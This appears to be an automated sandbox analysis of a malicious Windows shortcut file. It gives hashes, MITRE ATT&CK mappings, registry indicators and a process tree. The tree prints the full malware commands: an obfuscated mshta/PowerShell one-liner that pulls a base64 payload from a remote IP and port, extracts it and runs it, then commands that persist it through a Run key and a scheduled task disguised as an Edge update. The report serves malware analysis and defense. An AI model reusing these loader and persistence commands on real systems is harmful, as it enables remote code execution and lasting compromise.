41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229

Analysis

max time kernel
146s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-09-2024 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
Size

2KB
MD5

37fb639a295daa760c739bc21c553406
SHA1

50e4d8a112e4aad2c984d22f83c80c8723f232da
SHA256

41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
SHA512

28d67d4d788f301590164f28d38dd2aa73e4669eb6886e7536bec47aea08f2c27c3a507ac1636d907735f644d5e67184f420fd1e556629e10b83c8d338ef159a

Score

8^/10

execution persistence

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
5	3412	powershell.exe
17	3340	powershell.exe
83	3340	powershell.exe
97	3340	powershell.exe
98	3960	powershell.exe
101	3340	powershell.exe
105	3340	powershell.exe
107	3340	powershell.exe
108	1020	powershell.exe
109	3340	powershell.exe
110	3340	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exewscript.EXEwscript.EXEcmd.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	wscript.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	wscript.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	mshta.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winload = "c:\\windows\\system32\\wscript.exe //b //e:vbscript C:\\\\ProgramData\\\\R9147.vbs"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3412 powershell.exe
1020 powershell.exe
4652 powershell.exe
3340 powershell.exe
3960 powershell.exe
4828 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

WScript.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings WScript.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

524 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2400 WINWORD.EXE
2400 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	WScript.exe

pid	process
524	schtasks.exe

pid	process
2400	WINWORD.EXE
2400	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3412	powershell.exe
3412	powershell.exe
3340	powershell.exe
3340	powershell.exe
3960	powershell.exe
3960	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
4828	powershell.exe
4828	powershell.exe
1020	powershell.exe
1020	powershell.exe
3872	powershell.exe
3872	powershell.exe
4652	powershell.exe
4652	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

2400 WINWORD.EXE
2400 WINWORD.EXE
2400 WINWORD.EXE
2400 WINWORD.EXE
2400 WINWORD.EXE
2400 WINWORD.EXE
2400 WINWORD.EXE

pid	process
2400	WINWORD.EXE
2400	WINWORD.EXE
2400	WINWORD.EXE
2400	WINWORD.EXE
2400	WINWORD.EXE
2400	WINWORD.EXE
2400	WINWORD.EXE

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

cmd.exemshta.exepowershell.exeWScript.execmd.execmd.exewscript.EXEpowershell.exewscript.EXEpowershell.exe

description	pid	process	target process
PID 1176 wrote to memory of 2320	1176	cmd.exe	mshta.exe
PID 1176 wrote to memory of 2320	1176	cmd.exe	mshta.exe
PID 2320 wrote to memory of 3412	2320	mshta.exe	powershell.exe
PID 2320 wrote to memory of 3412	2320	mshta.exe	powershell.exe
PID 3412 wrote to memory of 1276	3412	powershell.exe	WScript.exe
PID 3412 wrote to memory of 1276	3412	powershell.exe	WScript.exe
PID 1276 wrote to memory of 2656	1276	WScript.exe	cmd.exe
PID 1276 wrote to memory of 2656	1276	WScript.exe	cmd.exe
PID 2656 wrote to memory of 524	2656	cmd.exe	schtasks.exe
PID 2656 wrote to memory of 524	2656	cmd.exe	schtasks.exe
PID 1276 wrote to memory of 2400	1276	WScript.exe	WINWORD.EXE
PID 1276 wrote to memory of 2400	1276	WScript.exe	WINWORD.EXE
PID 1276 wrote to memory of 2328	1276	WScript.exe	cmd.exe
PID 1276 wrote to memory of 2328	1276	WScript.exe	cmd.exe
PID 1276 wrote to memory of 3340	1276	WScript.exe	powershell.exe
PID 1276 wrote to memory of 3340	1276	WScript.exe	powershell.exe
PID 2328 wrote to memory of 624	2328	cmd.exe	reg.exe
PID 2328 wrote to memory of 624	2328	cmd.exe	reg.exe
PID 4912 wrote to memory of 3960	4912	wscript.EXE	powershell.exe
PID 4912 wrote to memory of 3960	4912	wscript.EXE	powershell.exe
PID 3960 wrote to memory of 3056	3960	powershell.exe	powershell.exe
PID 3960 wrote to memory of 3056	3960	powershell.exe	powershell.exe
PID 4912 wrote to memory of 4828	4912	wscript.EXE	powershell.exe
PID 4912 wrote to memory of 4828	4912	wscript.EXE	powershell.exe
PID 4340 wrote to memory of 1020	4340	wscript.EXE	powershell.exe
PID 4340 wrote to memory of 1020	4340	wscript.EXE	powershell.exe
PID 1020 wrote to memory of 3872	1020	powershell.exe	powershell.exe
PID 1020 wrote to memory of 3872	1020	powershell.exe	powershell.exe
PID 4340 wrote to memory of 4652	4340	wscript.EXE	powershell.exe
PID 4340 wrote to memory of 4652	4340	wscript.EXE	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1176

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject('WScr"+"ipt.Shell');a.Run(c,0,0);close();";a="System.IO."+s;t=" -Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='64.49.14.181';$p='8014';$r="+n+"IO."+s+"Reader(("+n+"Net.Sockets.TcpClient($r, $p)).Get"+s+"());$z=$r.ReadLine();$b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip';Set-Content"+t+"V $b -Encoding Byte;Expand-Archive"+t+"D "+d+";del $t;$v='"+d+"\\s.vbs';&$v;sc "+d+"\\nt91610 81";eval(w);
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $r='64.49.14.181';$p='8014';$r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream());$z=$r.ReadLine();$b=[Convert]::FromBase64String($z);$t='c:\programdata\t.zip';Set-Content -Path $t -V $b -Encoding Byte;Expand-Archive -Path $t -D c:\programdata;del $t;$v='c:\programdata\s.vbs';&$v;sc c:\programdata\nt91610 81
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\s.vbs"
4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57164-71251-9342] /tr "wscript //e:vbscript //b C:\\ProgramData\\07578.tmp" /f
5⤵
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\System32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57164-71251-9342] /tr "wscript //e:vbscript //b C:\\ProgramData\\07578.tmp" /f
6⤵
- Scheduled Task/Job: Scheduled Task
PID:524

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\ProgramData\DOC578309.docx" /o ""
5⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d "c:\windows\system32\wscript.exe //b //e:vbscript C:\\ProgramData\\R9147.vbs" /f
5⤵
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\System32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d "c:\windows\system32\wscript.exe //b //e:vbscript C:\\ProgramData\\R9147.vbs" /f
6⤵
- Adds Run key to start application
PID:624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -command $fn='C:\\ProgramData\\xM568.tmp';$d = Get-Content $fn; Invoke-Expression $d;
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //e:vbscript //b C:\\ProgramData\\07578.tmp
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -command $fn='C:\\ProgramData\\xS023.tmp';$d = Get-Content $fn; Invoke-Expression $d;
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\mex.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -command $fn='C:\\ProgramData\\tmpz.dat';$e = Get-Content $fn; Invoke-Expression $e;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //e:vbscript //b C:\\ProgramData\\07578.tmp
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -command $fn='C:\\ProgramData\\xS023.tmp';$d = Get-Content $fn; Invoke-Expression $d;
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\mex.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -command $fn='C:\\ProgramData\\tmpz.dat';$e = Get-Content $fn; Invoke-Expression $e;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\07578.tmp

Filesize
904B

MD5
73ed9b012785dc3b3ee33aa52700cfe4

SHA1
ddbc721eb0abe609885f30ef175b3ec0a8b7c720

SHA256
40c9f86e343f5a54570162bcca2d18f046d65c310d3ccfe975a2c2c31c5c47cb

SHA512
013388860aaf558596da34c15b56abdfa0391e27d313d94909c49b311699f0804ed4c08417cf59b34ee5d3b5e9ddd855cdb34c0f1acf1968c3943a3e4fa881df

Download Submit
C:\ProgramData\mex.ps1

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\ProgramData\xM568.tmp

Filesize
2KB

MD5
0c3fd7f45688d5ddb9f0107877ce2fbd

SHA1
69e038480a7b38ac62d7df0c416e83c67670720a

SHA256
c4aba442d881cfa112fe3a6b1d2381b089cbe163828cfdb2d57abba95737a07d

SHA512
da45ea22339283c6eaac6fe817cffd4841bd5cc84c438a39fcc4b0ecd4c79df072e3e25c4f7404ea3e85bb349450501df43c299311800d0c799330bf60ab52b6

Download Submit
C:\ProgramData\xS023.tmp

Filesize
1KB

MD5
1a1723be720c1d9cd57cf4a6a112df79

SHA1
eabfadb9034062fed3d32dc290e3284741f1dd58

SHA256
963af57641c094df6b5656552daaafd5ced0a1435261e612a4640604d023ebca

SHA512
b596a6fa848431fbcdd60dcf2a4d3a02212cd165048fbd856c2bf2ea976a2fa79a949ae7514cbd7d3734b403f77d47520070b304e63d06a77910f6c346c4e744

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cdba8235eea7e4f5e85ef9f2746cf289

SHA1
749a653a7d530b4da87ffca7ca734dc797daa6fe

SHA256
2358c91ef429ea96957bc60bd3bac5cb3e7321df6fd58cb93d229fce98437c58

SHA512
490296fd7afc46a5af9719906b960e460a15cb3b082a218ed4e86026e1e47f2750631385e3002e4b78bb59c0a50d3650722e2276821c1dc3cd55859161713384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c459be5dca10ea7e7415f500a98b78a

SHA1
ad7a3d7303f5762813e8a60cb4effeaee3c7fecb

SHA256
b067b088b58b536405263ba31d9d78a8d5a5d5a889aa62366dd970ca47c829f5

SHA512
9ff5ffed0124d59b01e9660c3119dc8e3a75998f5495a74adfa501147d4e2d47120de136af880b9bae1ac874f603f5443bad21e562570623ad6880f84c3dd9c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0a4b9238bac41560de43cc345991705c

SHA1
8556094e96dc4434dffbe2a7018fd13dbc0cb170

SHA256
f2a6e6beeab71abe7adcb60cb79bb8cb5b060a1110615ea7d12dc85841bc80bb

SHA512
5431e6cd2de4120c2c440578dc19a9297d9df09f8fd2ece8cfb78ebe1242bf3b47984d479c64686bbddda5704dfa5e436ed2f76d52c2c50fa13563c1d3fe6b1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7b189dbe0b1e0be78336306eb15d7086

SHA1
3dc4138470ca83ffeeefe31b24895a10de50be90

SHA256
f526bcfbde15b1be66936b84318491b692dc573d9bee12efacb3d3ec012acee8

SHA512
fab116909e46c81f1b356929542a7ca800fd6f64b4950bf5d21eff0f8e402e0f34d7b725b973fe2698d6dc14ff20b873f4b0350d15ae6e88fd5cd27b90dca459

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDA44.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lb41m3v4.314.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
334B

MD5
4ae452a027ae78c791d313ba3842b17e

SHA1
7e525a24706067822cad33bc334febeec49ac7dd

SHA256
0b04fdb17ba2b1399a5a384d9d47bd4522727df55bbc6e970dae79c82231d229

SHA512
22b1a59a33b2231ff86ed9257b418825cf9e0ed73e99ce5c98f7d68e87fd4e31756c8711a7b1895ea636f6965b453e26856120b210fc2f4432d3d96784ae529d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
21284d1d98f95aff7ee24e8b3dd6d0f1

SHA1
25fd9bf9b8d55bf8fc3f7fc4f882a61606492b35

SHA256
da9969743a031eb925b5280381101573a0f7996e29f07783b88adf59a6cc874c

SHA512
2e38b7c009f6b7664098e46cfc234fb38f83c7bc569d2b84b9fd7f035ec951efdf3c225f9d151a67baede7459dfafaae85d18fbb509d2335880aafc953c79ef9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
c3f7b31c9ab454a90592917a5fe09983

SHA1
329eeb5820714af5571c6b41e6cc50447397e843

SHA256
5d5dbfc13476b46e12d01d5f52840d28e5c2e08b05dc69ac8fdd1b27c4b11fb2

SHA512
db26ccca003297fdacb8c577012cefc98871bd74be11e827584bb5ccd100880db144c1d42b846cb5fba62affdc05e7e1d27420bb3a881cc964def7dca7265d74

Download Submit
C:\programdata\s.vbs

Filesize
1KB

MD5
622358469e5e24114dd0eb03da815576

SHA1
91899ba8f9c55fa161d5c496c3f181f1f74f3617

SHA256
b7fc11f37433b4f1d357e43b5a26802a96f5f043f70289360d60b12d6248e5ea

SHA512
ef1ce766a4bee2ce5a64fd314e250a5891023b66ad4d7515d8bcfc8f3b6f5d9890014abf8be07ba299a2f066f1e32b670f0021de539c20b3851b5a250b798530

Download Submit
memory/2400-625-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-31-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-48-0x00007FFA56650000-0x00007FFA56660000-memory.dmp

Filesize
64KB

Download
memory/2400-34-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-36-0x00007FFA56650000-0x00007FFA56660000-memory.dmp

Filesize
64KB

Download
memory/2400-33-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-35-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-32-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-624-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-626-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/2400-627-0x00007FFA58C50000-0x00007FFA58C60000-memory.dmp

Filesize
64KB

Download
memory/3412-13-0x000001E356E80000-0x000001E356E8A000-memory.dmp

Filesize
40KB

Download
memory/3412-9-0x000001E356DF0000-0x000001E356E12000-memory.dmp

Filesize
136KB

Download
memory/3412-12-0x000001E356EA0000-0x000001E356EB2000-memory.dmp

Filesize
72KB

Download